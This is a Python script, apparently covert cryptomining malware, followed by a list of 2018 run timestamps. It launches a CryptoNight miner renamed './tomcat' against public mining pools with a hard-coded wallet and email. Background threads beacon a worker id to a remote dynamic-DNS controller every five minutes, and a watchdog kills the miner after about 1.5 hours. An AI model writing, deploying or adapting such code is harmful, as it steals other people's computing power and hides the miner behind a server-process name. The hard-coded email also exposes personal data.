import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:01.586557
#2018-02-17 17:20:06.310304
#2018-02-17 19:08:01.808803
#2018-02-17 20:58:01.545993
#2018-02-17 22:44:01.632182
#2018-02-18 00:28:01.716865
#2018-02-18 02:19:04.215400
#2018-02-18 04:06:06.883319
#2018-02-18 05:55:08.177357
#2018-02-18 07:47:05.233431
#2018-02-18 09:35:04.215522
#2018-02-18 11:21:02.153949
#2018-02-18 13:07:03.265138
#2018-02-18 14:54:04.457132
#2018-02-18 16:42:04.015377
#2018-02-18 18:31:01.874561
#2018-02-18 20:18:06.776318
#2018-02-18 22:03:06.837198
#2018-02-18 23:52:01.882051
#2018-02-19 01:39:01.664544
#2018-02-19 03:27:04.666353
#2018-02-19 05:12:01.707331
#2018-02-19 06:57:05.972666
#2018-02-19 08:47:04.300059
#2018-02-19 10:36:06.095584
#2018-02-19 12:23:07.986426
#2018-02-19 14:09:08.120039
#2018-02-19 15:59:04.277017
#2018-02-19 17:47:06.185141
#2018-02-19 19:35:06.474099
#2018-02-19 21:22:07.906476
#2018-02-19 23:08:08.679292
#2018-02-20 00:54:07.445020
#2018-02-20 02:44:06.159448
#2018-02-20 04:33:03.973010
#2018-02-20 06:17:05.878552
#2018-02-20 08:02:03.971716
#2018-02-20 09:47:05.719422
#2018-02-20 11:31:05.066465
#2018-02-20 13:17:05.465759
#2018-02-20 15:03:07.473696
#2018-02-20 16:48:13.345676
#2018-02-20 18:32:07.179158
#2018-02-20 20:23:07.076418
#2018-02-20 22:08:05.671326
#2018-02-20 23:50:03.832985
#2018-02-21 01:36:03.883031
#2018-02-21 03:23:07.584182
#2018-02-21 05:10:08.683943
#2018-02-21 06:58:04.947515
#2018-02-21 08:45:07.024087
#2018-02-21 10:29:09.877179
#2018-02-21 12:18:08.421925
#2018-02-21 14:05:10.200488
#2018-02-21 15:49:10.406369
#2018-02-21 17:41:06.315944
#2018-02-21 19:26:06.015625
#2018-02-21 21:14:01.680788
#2018-02-21 23:00:06.528599
#2018-02-22 00:50:07.111968
#2018-02-22 02:38:06.982012
#2018-02-22 04:26:05.580451
#2018-02-22 06:12:03.913342
#2018-02-22 07:58:08.325202
#2018-02-22 09:47:07.445606
#2018-02-22 11:33:05.462790
#2018-02-22 13:20:11.022464
#2018-02-22 15:09:01.922720
#2018-02-22 16:53:02.096731
#2018-02-22 18:43:04.253022
#2018-02-22 20:36:04.958558
#2018-02-22 22:21:06.392303
#2018-02-23 00:08:06.504073
#2018-02-23 01:56:04.504439
#2018-02-23 03:45:07.681282
#2018-02-23 05:39:05.733464
#2018-02-23 07:24:06.483002
#2018-02-23 09:28:07.196272
#2018-02-23 11:33:07.732923
#2018-02-23 13:23:05.199116
#2018-02-23 15:10:03.099001
#2018-02-23 16:59:03.923210
#2018-02-23 18:45:09.992704
#2018-02-23 20:31:07.456938
#2018-02-23 22:18:07.067390
#2018-02-24 00:05:03.724214
#2018-02-24 01:54:01.380446
#2018-02-24 03:47:06.805208
#2018-02-24 05:35:07.779251
#2018-02-24 07:21:06.472710
#2018-02-24 09:11:05.072629
#2018-02-24 11:05:07.990646
#2018-02-24 12:54:04.525534
#2018-02-24 14:42:07.863346
#2018-02-24 16:33:05.048355
#2018-02-24 18:22:06.201245
#2018-02-24 20:08:05.319948
#2018-02-24 21:52:07.358486
#2018-02-25 01:55:06.887195
#2018-02-25 05:44:01.582070
#2018-02-25 11:37:02.363227